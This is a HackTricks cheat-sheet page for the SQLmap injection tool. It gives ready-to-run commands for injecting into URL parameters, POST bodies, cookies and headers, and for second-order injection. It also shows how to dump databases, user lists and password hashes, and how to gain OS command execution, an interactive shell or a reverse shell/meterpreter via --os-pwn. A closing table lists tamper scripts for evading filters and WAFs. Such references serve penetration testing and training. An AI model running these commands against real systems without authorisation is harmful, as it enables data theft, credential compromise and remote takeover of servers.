HackTricks Press
Search K

Appearance

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic arguments for SQLmap โ€‹

Generic โ€‹

bash
-u "<URL>" 
-p "<PARAM TO TEST>" 
--user-agent=SQLMAP 
--random-agent 
--threads=10 
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>" 
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Retrieve Information โ€‹

Internal โ€‹

bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

DB data โ€‹

bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place โ€‹

From Burp/ZAP capture โ€‹

Capture the request and create a req.txt file

bash
sqlmap -r req.txt --current-user

GET Request Injection โ€‹

bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection โ€‹

bash
sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers and other HTTP Methods โ€‹

bash
#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Second order injection โ€‹

bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Shell โ€‹

bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Crawl a website with SQLmap and auto-exploit โ€‹

bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Customizing Injection โ€‹

Set a suffix โ€‹

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Prefix โ€‹

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Help finding boolean injection โ€‹

bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper โ€‹

bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperDescription
apostrophemask.pyReplaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.pyReplaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.pyAppends encoded NULL byte character at the end of payload
base64encode.pyBase64 all characters in a given payload
between.pyReplaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
bluecoat.pyReplaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
chardoubleencode.pyDouble url-encodes all characters in a given payload (not processing already encoded)
commalesslimit.pyReplaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
commalessmid.pyReplaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
concat2concatws.pyReplaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.pyUrl-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.pyUnicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"
charunicodeescape.pyUnicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"
equaltolike.pyReplaces all occurances of operator equal ('=') with operator 'LIKE'
escapequotes.pySlash escape quotes (' and ")
greatest.pyReplaces greater than operator ('>') with 'GREATEST' counterpart
halfversionedmorekeywords.pyAdds versioned MySQL comment before each keyword
ifnull2ifisnull.pyReplaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
modsecurityversioned.pyEmbraces complete query with versioned comment
modsecurityzeroversioned.pyEmbraces complete query with zero-versioned comment
multiplespaces.pyAdds multiple spaces around SQL keywords
nonrecursivereplacement.pyReplaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.pyAdds a percentage sign ('%') infront of each character
overlongutf8.pyConverts all characters in a given payload (not processing already encoded)
randomcase.pyReplaces each keyword character with random case value
randomcomments.pyAdd random comments to SQL keywords
securesphere.pyAppends special crafted string
sp_password.pyAppends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.pyReplaces space character (' ') with comments
space2dash.pyReplaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.pyReplaces space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.pyReplaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.pyReplaces space character (' ') with plus ('+')
space2randomblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.pyReplaces AND and OR logical operators with their symbolic counterparts (&& and
unionalltounion.pyReplaces UNION ALL SELECT with UNION SELECT
unmagicquotes.pyReplaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
uppercase.pyReplaces each keyword character with upper case value 'INSERT'
varnish.pyAppend a HTTP header 'X-originating-IP'
versionedkeywords.pyEncloses each non-function keyword with versioned MySQL comment
versionedmorekeywords.pyEncloses each keyword with versioned MySQL comment
xforwardedfor.pyAppend a fake HTTP header 'X-Forwarded-For'
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: